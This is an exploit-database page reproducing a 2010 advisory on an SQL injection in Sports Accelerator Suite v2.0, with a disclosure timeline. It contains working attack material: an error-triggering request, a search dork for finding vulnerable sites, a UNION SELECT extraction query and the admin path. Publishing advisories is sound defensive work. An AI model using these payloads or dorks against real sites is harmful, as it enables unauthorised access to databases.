[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Sports Accelerator Suite v2.0 (news_id) SQL Injection Vulnerability

Author
LiquidWorm
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13703
Category
web applications
Date add
14-08-2010
Platform
php
===================================================================
Sports Accelerator Suite v2.0 (news_id) SQL Injection Vulnerability
===================================================================

Vendor: Athlete Web Services, Inc. / AWS Sports
Product Web Page: http://www.athletewebservices.com
 
 
Summary: Content Management System (PHP+MySQL).
 
 
Description: The CMS is vulnerable to an SQL Injection attack when input is
passed to the "news_id" parameter. The script fails to properly sanitize the
input before being returned to the user allowing the attacker to compromise
the entire DB system and view sensitive information.
 
 
=============================================================================
 
GET .../show_news.php?news_id=xx%27
 
1064 - You have an error in your SQL syntax. Check the manual that corresponds
to your MySQL server version for the right syntax to use near '\'' at line xx.
 
=============================================================================
 
 
Affected Version: 1.1 and 2.0
 
 
Tested On: Microsoft IIS 6.0
           MySQL 4.0.15-log
           PHP 4.3.3
 
 
Vulnerability Discovered By: Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
http://www.zeroscience.mk
 
 
Vendor Status: [05.06.2010] Vulnerability discovered.
               [09.08.2010] Vendor contacted.
               [13.08.2010] No response from vendor.
               [14.08.2010] Public advisory released.
 
 
Zero Science Lab Advisory ID: ZSL-2010-4949
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4949.php
 
 
Vector:
 
-----------------------------------------------------------------------------
 
Dork: "Designed and powered by AWS Sports"
 
Query: http://vulnpage.tld/show_news.php?news_id=xx+and+1=0+%20union%20select%20database%28%29,2,3,4,5,6,7..[n]
 
Admin: http://vulpage.tld/admin/index.php
 
-----------------------------------------------------------------------------



#  0day.today [2024-12-25]  #